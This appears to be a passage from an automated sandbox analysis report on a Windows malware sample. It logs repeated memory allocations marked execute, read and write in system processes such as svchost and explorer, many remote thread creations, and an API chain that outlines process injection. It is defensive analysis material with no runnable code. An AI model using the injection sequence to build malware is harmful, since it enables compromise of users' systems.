            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: C70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 960000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 110000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: CE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 330000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\conhost.exe base: 620000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: E50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: B20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 750000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: A80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: B80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dwm.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\sihost.exe base: 460000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: A30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: B60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\explorer.exe base: 89A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: C80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 970000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 120000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: CF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 340000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\conhost.exe base: 630000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: E60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: B30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 760000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: A90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: B90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dwm.exe base: D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\sihost.exe base: 470000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: A40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: B70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\explorer.exe base: 8B10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: C90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 980000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: D00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 350000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\conhost.exe base: 640000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: E70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: B40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 770000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: AA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: BA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dwm.exe base: E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\sihost.exe base: 480000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: A50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: B80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\explorer.exe base: 8B20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: CA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 990000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: FA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 140000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: D10000 protect: page execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Memory allocated: C:\Windows\System32\sihost.exe base: EC0000 protect: page execute and read and write
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Memory allocated: C:\Windows\System32\svchost.exe base: B20000 protect: page execute and read and write
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1490000 protect: page execute and read and write
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Memory allocated: C:\Windows\explorer.exe base: B8C0000 protect: page execute and read and write
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 16D0000 protect: page execute and read and write
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: 17A0000 protect: page execute and read and write
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 13C0000 protect: page execute and read and write
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 19D0000 protect: page execute and read and write
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 14C0000 protect: page execute and read and write
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1450000 protect: page execute and read and write
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Memory allocated: C:\Windows\System32\smartscreen.exe base: B70000 protect: page execute and read and write
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: B10000 protect: page execute and read and write
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: C20000 protect: page execute and read and write
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1740000 protect: page execute and read and write
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: D90000 protect: page execute and read and write
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1580000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Code function: 0_2_01291EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree, | 0_2_01291EF6
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 2410000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 2460000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 2290000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 22A0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 950000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 960000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: BF0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: C00000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 340000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 350000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 1490000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 2E70000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 2470000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 25C0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: F60000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: F70000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 21D0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 2320000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 2930000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 2980000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 840000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 890000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 2460000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 24B0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2260000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 22B0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: F20000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: F70000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2390000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 23E0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 25B0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 25C0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2A90000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2DE0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2D00000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2D60000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 9C0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 9D0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 1270000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 1280000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2DC0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2E10000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2EB0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2F00000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2330000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2380000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2450000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 24A0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2F50000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2F60000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 860000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2420000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 25D0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2620000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 1170000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 1180000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2700000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2710000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2940000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2A90000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 710000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 760000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2210000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 2260000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: C40000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: C50000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 26E0000
